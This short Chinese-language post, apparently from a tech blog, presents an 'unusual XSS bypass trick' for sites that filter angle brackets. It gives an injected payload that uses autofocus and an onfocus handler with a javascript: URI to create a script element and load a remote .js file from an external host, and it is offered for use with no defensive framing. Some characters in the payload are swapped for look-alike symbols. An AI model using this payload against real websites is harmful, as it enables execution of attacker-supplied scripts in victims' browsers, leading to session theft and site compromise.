這是一篇另類的XSS繞過奇招

1.過濾了<>尖括號:  原理:利用html以及js僞協議,當用戶打開頁面緩衝頁面會自動獲取焦點,從而觸發js代碼生成script標籤,達到目的。 autofocus οnfοcus=location=」javasCript:s=document.createElement(「script」);s.src=」http:///xx.js」; document.body.appendChild(s);
相關文章
相關標籤/搜索